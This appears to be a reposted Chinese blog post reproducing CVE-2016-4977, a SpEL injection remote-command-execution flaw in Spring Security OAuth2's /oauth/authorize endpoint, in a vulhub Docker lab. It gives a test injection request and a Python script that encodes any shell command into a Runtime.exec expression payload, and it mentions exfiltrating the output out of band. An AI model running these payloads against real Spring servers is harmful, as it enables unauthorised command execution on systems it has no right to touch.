Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977）

Others 2021-11-18 02:16:46 views: null

Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977）

漏洞介绍：

Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令

环境复现：

在虚拟机中用vulhub靶场提供的docker容器来复现

jdk版本1.7

python版本3.5

首先安装好vulhub和docker，进入vulhub目录：spring/CVE-2016-4977，启动docker容器

漏洞利用：

访问路径/oauth/authorize，会看到左上角有个绿色叶子的标志，一般都是spring或者springboot

直接打poc，可以看到有el表达式注入的形式

/oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test

如果要命令执行需要把执行结果带外才行，java的命令执行漏洞基本需要编码

完成编码

Base64编码后的命令执行语句还需要进行ascii编码，直接带入以下python脚本中

message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'
print(poc)

得到的编码之后的poc

python编码的poc直接替换掉前面的el表达式，漏洞成功复现

Guess you like

Origin blog.csdn.net/qq_48985780/article/details/121007181

Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977）

Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977）

Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977）

Spring Security oAuth2 Profile

Authentication and authorization of Spring Security + Oauth2

Spring Security 与 OAuth2（介绍）

Spring security - implement oauth2 sso

CORS interfering with Spring Security oauth2

Spring Security parse (five) - Spring Security Oauth2 development

Spring Cloud Learning (X) Spring Security, OAuth2, JWT

Spring Security +Oauth2 +Spring boot dynamically define permissions

How to refresh OAuth2 token with Spring Security 5 OAuth2 client and RestTemplate

spring security integration oauth2 practical logic flow summary

Spring Cloud Security: Oauth2 use in conjunction with JWT

Spring Cloud Security: Oauth2 achieve single sign-on

JWT as Spring Security OAuth2 use of token memory

Spring Security OAuth2 Demo - Implicit authorization mode (the Implicit)

WebSocket with Spring security oauth2 achieve alternative verification authority

Spring Security oAuth2 create an authentication server module

Spring Security oAuth2 case of projects created

Studies online --day16 Spring Security Oauth2

Spring security OAuth2 problems encountered in the integration process

Changbu Mall (9): Spring Security Oauth2

Spring Security Oauth2 (two) code authorization code mode

Spring Security Oauth2 (1) Introduction to the overall process

Spring Security Oauth2 (3) Password Code Mode

Spring Security Oauth2 (four) password code pattern code

Spring Security OAuth2入门踩坑

Spring Security OAuth2 系列实战（一)

Spring security - oauth2 resource server tests

Recommended

The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!

Ranking

Getting the basic concepts of ROS + catkin Profile

Spring Learning (2) --- Assembling Beans in the IoC Container

js to get the src attribute of the image regularly

STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud

Short video learning - 3, pandas simple use of pivot_table

Print directory of project configuration log, output log

Understand the difference between vi and vim in Linux in 3 minutes

1 + x certificate Web front-end development HTML5 special exercises

mangodb save and insert the difference

7-1 Family tree processing (50 points) (binary tree solution)

Daily

More

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)